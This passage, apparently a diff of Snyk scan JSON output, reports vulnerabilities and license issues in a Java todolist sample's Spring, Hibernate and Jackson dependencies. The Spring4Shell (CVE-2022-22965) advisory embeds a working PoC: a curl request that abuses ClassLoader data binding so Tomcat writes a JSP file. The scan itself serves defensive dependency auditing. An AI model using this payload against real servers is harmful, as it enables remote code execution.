"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 6.5, - "modificationTime": "2024-03-11T09:53:09.820460Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 6.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:01:15.433654Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", - "assigner": "NVD", - "severity": "medium", - "baseScore": 6.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:09.820460Z" - } - ], - "description": "## Overview\n\nAffected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling when a user provides a very long `SpEL` expression.\n## Remediation\nUpgrade `org.springframework:spring-expression` to version 5.2.24.RELEASE, 5.3.27, 6.0.8 or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/965a6392757d20f9db19241126fcc719a51eac15)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/b73f5fcac22555f844cf27a7eeb876cb9d7f7f7e)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/ebc82654282bda547fbc20a9749ab1bda886a46f)\n- [Vulnerability Advisory](https://spring.io/security/cve-2023-20863)\n", - "epssDetails": { - "percentile": "0.70100", - "probability": "0.00306", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2023-20863" - ], - "CWE": [ - "CWE-770" - ] - }, - "packageName": "org.springframework:spring-expression", - "proprietary": false, - "creationTime": "2023-04-14T06:33:20.884492Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2023-04-14T06:25:45Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - 
"format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.springframework", - "artifactId": "spring-expression" - }, - "publicationTime": "2023-04-14T06:33:21.063044Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:09.820460Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.springframework:spring-context@3.2.6.RELEASE", - "org.springframework:spring-expression@3.2.6.RELEASE" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "org.springframework:spring-expression", - "version": "3.2.6.RELEASE", - "severityWithCritical": "medium" - }, - { - "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2436751", - "title": "Remote Code Execution", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[ ,5.2.20)", - "[5.3.0, 5.3.18)" - ] - }, - "exploit": "High", - "fixedIn": [ - "5.2.20", - "5.3.18" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "critical", - "cvssScore": 9.8, - "functions": [ - { - "version": [ - "[ ,5.2.20)", - "[5.3.0, 5.3.18)" - ], - "functionId": { - "filePath": "org/springframework/beans/CachedIntrospectionResults.java", - "className": "CachedIntrospectionResults", - "functionName": "" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "org.springframework:spring-beans", - "references": [ - { - "url": "https://www.cyberkendra.com/2022/03/springshell-rce-0-day-vulnerability.html", - "title": "CyberKendra Post" - }, - { - "url": "https://github.com/spring-projects/spring-framework/commit/002546b3e4b8d791ea6acccb81eb3168f51abb15", - "title": "GitHub Commit" - }, - { - "url": "https://www.lunasec.io/docs/blog/spring-rce-vulnerabilities/", - 
"title": "LunaSec Blog" - }, - { - "url": "https://blog.payara.fish/payara-and-spring4shell", - "title": "Payara Blogpost" - }, - { - "url": "https://github.com/CalumHutton/CVE-2022-22965-PoC_Payara", - "title": "Payara PoC" - }, - { - "url": "https://snyk.io/blog/spring4shell-zero-day-rce-spring-framework-explained/", - "title": "Snyk Blog - Technical Breakdown" - }, - { - "url": "https://github.com/Kirill89/CVE-2022-22965-PoC", - "title": "Snyk PoC" - }, - { - "url": "https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement", - "title": "Spring Security Announcement" - }, - { - "url": "https://spring.io/blog/2022/04/01/spring-framework-rce-mitigation-alternative", - "title": "Spring Tomcat Mitigation Advice" - }, - { - "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", - "title": "CISA - Known Exploited Vulnerabilities" - }, - { - "url": "https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2022/CVE-2022-22965.yaml", - "title": "Nuclei Templates" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:48:12.628867Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:48:15.463472Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H", - "assigner": "Snyk", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-30T15:25:03.231650Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:12.628867Z" - }, - { - "type": "secondary", - "vector": 
"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:15.463472Z" - } - ], - "description": "## Overview\n[org.springframework:spring-beans](https://www.baeldung.com/spring-bean) is a package that is the basis for Spring Framework's IoC container. The BeanFactory interface provides an advanced configuration mechanism capable of managing any type of object.\n\nAffected versions of this package are vulnerable to Remote Code Execution via manipulation of `ClassLoader` that is achievable with a POST HTTP request. This could allow an attacker to execute a webshell on a victim's application (TomCat), or download arbitrary files from the server (Payara/Glassfish).\r\n\r\n**Note:** \r\n* Current public exploits require victim applications to be built with JRE version 9 (or above) and to be deployed on either Tomcat, Payara, or Glassfish. \r\n\r\n* However, we have confirmed that it is technically possible for additional exploits to work under additional application configurations as well. \r\n\r\n* As such, while we recommend users prioritize first remediating against the configuration described above, for full protection, we also recommend upgrading all vulnerable versions to the fixed `spring-beans` version regardless of the application configuration.\r\n\r\n### Update Log \r\n* **31/03/2022 -** Severity was raised from 8.1 to 9.8\r\n* **08/04/2022 -** Advisory was updated to reflect that Snyk's security research team was able to author a working PoC of this vulnerability against applications that are deployed on Payara (which is based on Glassfish). 
\r\n\r\n\r\n## PoC\r\n```java\r\n1/ docker run -p 8888:8080 --rm --interactive --tty --name vm1 tomcat:9.0\r\n2/ ./mvnw install\r\n3/ docker cp target/handling-form-submission-complete.war vm1:/usr/local/tomcat/webapps\r\n4/ curl -X POST \\\r\n -H \"pre:<%\" \\\r\n -H \"post:;%>\" \\\r\n -F 'class.module.classLoader.resources.context.parent.pipeline.first.pattern=%{pre}iSystem.out.println(123)%{post}i' \\\r\n -F 'class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp' \\\r\n -F 'class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/handling-form-submission-complete' \\\r\n -F 'class.module.classLoader.resources.context.parent.pipeline.first.prefix=rce' \\\r\n -F 'class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=' \\\r\n http://localhost:8888/handling-form-submission-complete/greeting\r\n5/ curl http://localhost:8888/handling-form-submission-complete/rce.jsp\r\n```\n## Remediation\nUpgrade `org.springframework:spring-beans` to version 5.2.20, 5.3.18 or higher.\n## References\n- [CyberKendra Post](https://www.cyberkendra.com/2022/03/springshell-rce-0-day-vulnerability.html)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/002546b3e4b8d791ea6acccb81eb3168f51abb15)\n- [LunaSec Blog](https://www.lunasec.io/docs/blog/spring-rce-vulnerabilities/)\n- [Payara Blogpost](https://blog.payara.fish/payara-and-spring4shell)\n- [Payara PoC](https://github.com/CalumHutton/CVE-2022-22965-PoC_Payara)\n- [Snyk Blog - Technical Breakdown](https://snyk.io/blog/spring4shell-zero-day-rce-spring-framework-explained/)\n- [Snyk PoC](https://github.com/Kirill89/CVE-2022-22965-PoC)\n- [Spring Security Announcement](https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement)\n- [Spring Tomcat Mitigation Advice](https://spring.io/blog/2022/04/01/spring-framework-rce-mitigation-alternative)\n- [CISA - Known Exploited 
Vulnerabilities](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2022/CVE-2022-22965.yaml)\n", - "epssDetails": { - "percentile": "0.99975", - "probability": "0.97485", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2022-22965" - ], - "CWE": [ - "CWE-94" - ] - }, - "packageName": "org.springframework:spring-beans", - "proprietary": false, - "creationTime": "2022-03-30T21:42:31.436000Z", - "functions_new": [ - { - "version": [ - "[ ,5.2.20)", - "[5.3.0, 5.3.18)" - ], - "functionId": { - "className": "org.springframework.beans.CachedIntrospectionResults", - "functionName": "" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2022-03-30T21:42:24Z", - "exploitDetails": { - "sources": [ - "CISA", - "Nuclei Templates", - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "High", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Attacked", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.springframework", - "artifactId": "spring-beans" - }, - "publicationTime": "2022-03-30T22:32:44Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-06-03T08:53:17.474380Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.springframework:spring-context@3.2.6.RELEASE", - "org.springframework:spring-beans@3.2.6.RELEASE" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "org.springframework:spring-beans", - "version": "3.2.6.RELEASE", - "severityWithCritical": "critical" - }, - { - "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2823313", - "title": "Denial of Service (DoS)", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", - "credit": [ - "Rob 
Ryan" - ], - "semver": { - "vulnerable": [ - "[,5.2.22.RELEASE)", - "[5.3.0,5.3.20)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "5.2.22.RELEASE", - "5.3.20" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 5.3, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.springframework:spring-beans", - "references": [ - { - "url": "https://github.com/spring-projects/spring-framework/commit/50177b1ad3485bd44239b1756f6c14607476fcf2", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/spring-projects/spring-framework/commit/83186b689f11f5e6efe7ccc08fdeb92f66fcd583", - "title": "GitHub Commit" - }, - { - "url": "https://tanzu.vmware.com/security/cve-2022-22970", - "title": "Tanzu vmware" - } - ], - "cvssDetails": [ - { - "assigner": "Red Hat", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 5.3, - "modificationTime": "2024-03-11T09:47:28.086179Z" - }, - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 5.3, - "modificationTime": "2024-03-11T09:49:48.407397Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:56:21.626910Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:47:28.086179Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", - "assigner": "NVD", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:49:48.407397Z" - } - ], - "description": "## 
Overview\n[org.springframework:spring-beans](https://www.baeldung.com/spring-bean) is a package that is the basis for Spring Framework's IoC container. The BeanFactory interface provides an advanced configuration mechanism capable of managing any type of object.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) if it relies on data binding to set a `MultipartFile` or `javax.servlet.Part` to a field in a model object.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. 
For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `org.springframework:spring-beans` to version 5.2.22.RELEASE, 5.3.20 or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/50177b1ad3485bd44239b1756f6c14607476fcf2)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/83186b689f11f5e6efe7ccc08fdeb92f66fcd583)\n- [Tanzu vmware](https://tanzu.vmware.com/security/cve-2022-22970)\n", - "epssDetails": { - "percentile": "0.75300", - "probability": "0.00449", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2022-22970" - ], - "CWE": [ - "CWE-400" - ] - }, - "packageName": "org.springframework:spring-beans", - "proprietary": false, - "creationTime": "2022-05-12T08:45:35.744127Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2022-05-12T08:17:10Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.springframework", - "artifactId": "spring-beans" - }, - "publicationTime": "2022-05-12T09:49:10.833602Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:49:48.407397Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.springframework:spring-context@3.2.6.RELEASE", - "org.springframework:spring-beans@3.2.6.RELEASE" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "org.springframework:spring-beans", - "version": "3.2.6.RELEASE", - "severityWithCritical": "medium" - }, - { - "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2689634", - "title": "Improper Handling 
of Case Sensitivity", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N/E:P", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,5.2.21)", - "[5.3.0, 5.3.19)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "5.2.21", - "5.3.19" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "low", - "cvssScore": 3.7, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.springframework:spring-context", - "references": [ - { - "url": "https://github.com/spring-projects/spring-framework/commit/833e750175349ab4fd502109a8b41af77e25cdea", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/spring-projects/spring-framework/issues/28333", - "title": "GitHub Issue" - }, - { - "url": "https://github.com/MarcinGadz/spring-rce-poc", - "title": "PoC" - }, - { - "url": "https://spring.io/blog/2022/04/13/spring-framework-data-binding-rules-vulnerability-cve-2022-22968", - "title": "Spring Blog Post" - }, - { - "url": "https://tanzu.vmware.com/security/cve-2022-22968", - "title": "Tanzu Advisory" - } - ], - "cvssDetails": [ - { - "assigner": "Red Hat", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", - "cvssV3BaseScore": 5.3, - "modificationTime": "2024-03-11T09:47:26.822810Z" - }, - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", - "cvssV3BaseScore": 5.3, - "modificationTime": "2024-03-11T09:49:16.458425Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N/E:P", - "assigner": "Snyk", - "severity": "low", - "baseScore": 3.7, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:56:31.233852Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - 
"modificationTime": "2024-03-11T09:47:26.822810Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", - "assigner": "NVD", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:49:16.458425Z" - } - ], - "description": "## Overview\n\nAffected versions of this package are vulnerable to Improper Handling of Case Sensitivity via the patterns for `disallowedFields` on a `DataBinder`. As a result, a field is not effectively protected unless it is listed with both upper and lower case for the first character of the field, including nested fields within the property path.\n## Remediation\nUpgrade `org.springframework:spring-context` to version 5.2.21, 5.3.19 or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/833e750175349ab4fd502109a8b41af77e25cdea)\n- [GitHub Issue](https://github.com/spring-projects/spring-framework/issues/28333)\n- [PoC](https://github.com/MarcinGadz/spring-rce-poc)\n- [Spring Blog Post](https://spring.io/blog/2022/04/13/spring-framework-data-binding-rules-vulnerability-cve-2022-22968)\n- [Tanzu Advisory](https://tanzu.vmware.com/security/cve-2022-22968)\n", - "epssDetails": { - "percentile": "0.29205", - "probability": "0.00065", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2022-22968" - ], - "CWE": [ - "CWE-178" - ] - }, - "packageName": "org.springframework:spring-context", - "proprietary": false, - "creationTime": "2022-04-14T11:54:10.207823Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2022-04-14T11:43:54Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.springframework", - "artifactId": 
"spring-context" - }, - "publicationTime": "2022-04-14T12:09:40Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:49:16.458425Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.springframework:spring-context@3.2.6.RELEASE" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "org.springframework:spring-context", - "version": "3.2.6.RELEASE", - "severityWithCritical": "low" - }, - { - "id": "snyk:lic:maven:org.aspectj:aspectjweaver:EPL-1.0", - "type": "license", - "title": "EPL-1.0 license", - "semver": { - "vulnerable": [ - "[1.5.4,)" - ] - }, - "license": "EPL-1.0", - "language": "java", - "description": "EPL-1.0 license", - "packageName": "org.aspectj:aspectjweaver", - "creationTime": "2024-06-18T21:24:04.112Z", - "packageManager": "maven", - "publicationTime": "2024-06-18T21:24:04.112Z", - "severity": "medium", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.aspectj:aspectjweaver@1.8.2" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "org.aspectj:aspectjweaver", - "version": "1.8.2", - "severityWithCritical": "medium" - }, - { - "id": "snyk:lic:maven:org.hibernate.common:hibernate-commons-annotations:LGPL-2.1", - "type": "license", - "title": "LGPL-2.1 license", - "semver": { - "vulnerable": [ - "[4.0.0.CR1,)" - ] - }, - "license": "LGPL-2.1", - "language": "java", - "description": "LGPL-2.1 license", - "packageName": "org.hibernate.common:hibernate-commons-annotations", - "creationTime": "2024-06-18T11:03:46.980Z", - "packageManager": "maven", - "publicationTime": "2024-06-18T11:03:46.980Z", - "severity": "medium", - "from": [ - 
"io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.hibernate:hibernate-core@4.3.7.Final", - "org.hibernate.common:hibernate-commons-annotations@4.0.5.Final" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "org.hibernate.common:hibernate-commons-annotations", - "version": "4.0.5.Final", - "severityWithCritical": "medium" - }, - { - "id": "snyk:lic:maven:org.hibernate.javax.persistence:hibernate-jpa-2.1-api:EPL-1.0", - "type": "license", - "title": "EPL-1.0 license", - "semver": { - "vulnerable": [ - "[1.0.0.Final,)" - ] - }, - "license": "EPL-1.0", - "language": "java", - "description": "EPL-1.0 license", - "packageName": "org.hibernate.javax.persistence:hibernate-jpa-2.1-api", - "creationTime": "2024-06-18T12:03:42.953Z", - "packageManager": "maven", - "publicationTime": "2024-06-18T12:03:42.953Z", - "severity": "medium", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.hibernate:hibernate-core@4.3.7.Final", - "org.hibernate.javax.persistence:hibernate-jpa-2.1-api@1.0.0.Final" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "org.hibernate.javax.persistence:hibernate-jpa-2.1-api", - "version": "1.0.0.Final", - "severityWithCritical": "medium" - }, - { - "id": "snyk:lic:maven:org.hibernate:hibernate-entitymanager:LGPL-2.0", - "type": "license", - "title": "LGPL-2.0 license", - "semver": { - "vulnerable": [ - "[3.5.0.Beta-1, 5.3.1.Final)" - ] - }, - "license": "LGPL-2.0", - "language": "java", - "description": "LGPL-2.0 license", - "packageName": "org.hibernate:hibernate-entitymanager", - "creationTime": "2024-06-18T11:52:01.913Z", - "packageManager": "maven", - "publicationTime": "2024-06-18T11:52:01.913Z", - "severity": "medium", - "from": [ - 
"io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.hibernate:hibernate-entitymanager@4.3.7.Final" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "org.hibernate:hibernate-entitymanager", - "version": "4.3.7.Final", - "severityWithCritical": "medium" - }, - { - "id": "snyk:lic:maven:org.jboss.logging:jboss-logging:LGPL-2.1", - "type": "license", - "title": "LGPL-2.1 license", - "semver": { - "vulnerable": [ - "[3.0.1.GA, 3.1.2.GA)" - ] - }, - "license": "LGPL-2.1", - "language": "java", - "description": "LGPL-2.1 license", - "packageName": "org.jboss.logging:jboss-logging", - "creationTime": "2024-06-18T02:47:02.411Z", - "packageManager": "maven", - "publicationTime": "2024-06-18T02:47:02.411Z", - "severity": "medium", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "org.hibernate:hibernate-validator@4.3.1.Final", - "org.jboss.logging:jboss-logging@3.1.0.CR2" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "org.jboss.logging:jboss-logging", - "version": "3.1.0.CR2", - "severityWithCritical": "medium" - } - ], - "upgrade": { - "com.fasterxml.jackson.core:jackson-core@2.6.5": { - "upgradeTo": "com.fasterxml.jackson.core:jackson-core@2.8.6", - "upgrades": [ - "com.fasterxml.jackson.core:jackson-core@2.6.5", - "com.fasterxml.jackson.core:jackson-core@2.6.5" - ], - "vulns": [ - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-31519", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-31520" - ] - }, - "com.fasterxml.jackson.core:jackson-databind@2.6.5": { - "upgradeTo": "com.fasterxml.jackson.core:jackson-databind@2.12.7.1", - "upgrades": [ - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - 
"com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - 
"com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", 